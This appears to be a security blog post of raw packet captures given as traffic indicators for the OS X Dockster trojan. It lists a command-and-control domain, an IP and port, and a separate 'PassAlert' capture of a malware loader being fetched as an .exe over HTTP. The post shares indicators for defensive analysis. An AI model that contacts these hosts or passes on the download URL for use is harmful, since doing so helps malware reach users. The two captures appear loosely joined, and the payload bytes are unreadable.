HISTORICAL Malware Sample – MAC TROJAN OSX DOCKSTER – Traffic Sample Indicators Analysis

By | July 25, 2015

2012-11-29 23:57:19.365416 IP 8.8.8.8.53 > 172.29.0.109.53182: 39642 1/0/0 A 123.120.110.212 (48)

E .L.x..5..o…….m.5…8……………itsec.eicp.net……………..{xn.

2012-11-29 23:57:19.366096 IP 172.29.0.109.49294 > 123.120.110.212.8088: Flags [S], seq 2281913743, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 560397766 ecr 0,sackOK,eol], length 0

E..@.>@.@……m{xn…….=……….@………….

!f……….

 

===========================

PassAlert

–==========================

2013-05-12 15:13:41.237980 IP 172.16.253.240.53 > 8.8.8.8.53: 34127+ A? porno-video-free.com. (38)

E..B……………..5.5…..O………..porno-video-free.com…..

2013-05-12 15:13:41.238039 IP 172.16.253.240.53 > 4.2.2.2.53: 34127+ A? porno-video-free.com. (38)

E..B……………..5.5…..O………..porno-video-free.com…..

2013-05-12 15:13:41.265029 IP 8.8.8.8.53 > 172.16.253.240.53: 34127 1/0/0 A 64.74.223.10 (54)

E..R……………..5.5.>…O………..porno-video-free.com……………..@J.

 

2013-05-12 15:13:41.270894 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [S], seq 3097962556, win 64240, options [mss 1460,nop,nop,sackOK], length 0

E..0..@…1Z….@J.

.       .P..(<….p……………

2013-05-12 15:13:41.284000 IP 64.74.223.10.80 > 172.16.253.240.1033: Flags [S.], seq 910574124, ack 3097962557, win 64240, options [mss 1460], length 0

E..,……..@J.

…..P. 6FB,..(=`…v………

2013-05-12 15:13:41.284076 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [.], ack 1, win 64240, length 0

E..(..@…1a….@J.

.       .P..(=6FB-P…….

2013-05-12 15:13:41.284321 IP 172.16.253.240.1033 > 64.74.223.10.80: Flags [P.], seq 1:92, ack 1, win 64240, length 91

E…..@…1…..@J.

.       .P..(=6FB-P…….GET /loader/bin/file1.exe HTTP/1.1

User-Agent: Mozilla/5.0

Host: porno-video-free.com

 

 

 

Share Button

One thought on “HISTORICAL Malware Sample – MAC TROJAN OSX DOCKSTER – Traffic Sample Indicators Analysis

  1. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *